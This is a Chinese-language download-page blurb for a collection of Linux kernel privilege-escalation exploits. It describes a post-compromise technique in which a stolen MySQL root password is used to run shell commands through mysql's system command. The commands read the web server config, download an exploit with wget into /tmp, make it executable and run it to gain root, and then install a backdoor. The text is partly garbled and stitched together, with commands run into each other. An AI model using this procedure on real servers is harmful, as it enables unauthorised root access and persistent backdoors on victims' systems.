这是简单的linux提权收集的N多linux内核exp下载,创建一个表, Linux低权限提权 反弹试试 tmp里创建好文件,就可以利用这个函数执行命令,准备提权.先看下linux内核 uname -a 2.6.18-194.11.3.el5 内核 2010的,我们是要来做其他的事情。
软件介绍
简单的linux提权收集的N多linux内核exp是按照上面的方法,可能报错会显示出来,估计修改过了 试着提权CMDSHELL为USER或者ROOT,,竟然可以复制过来,但是不可写复制不过去。
软件说明
一般我们按照常规思路,搞到mysql的root密码之后,我们都会连接上去,创建一个表,然后outfile,搞到一个webshell ,然后提权如斯这般。今天我们换一种方式。
按照上面的方法,我们需要知道web的绝对路径,当然这个很不好找,有些有sqlinjection的,可能报错会显示出来,有的就不一定了。但是 按照我的的方法,没有必要再去找web路径了,直接执行
mysql>system vi /etc/httpd/conf/httpd.conf;
直接这样就可以找到web的路径,当然,我们的目的并不是找web路径,放webshell进去。我们是要来做其他的事情,好比,下载exp执行, 搞到 root权限,然后装后门
mysql>system wgetmysql>system chmod +x xxxx; mysql>system ./xxxx;
这样mysql的root此时就成为system的root了,剩下的事情,假如开了ssh,就ssh连接上去,输入mysql的用户密码,ok,搞 定。
相关介绍
然后百度或者其它路径找EXP,2.6.18-194这个内核我已经收藏过.上传到/tmp,为什么要传到这个目录呢?
因为tmp目录可写可执行一般,继续ing.
软件截图
扫一扫
1749
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
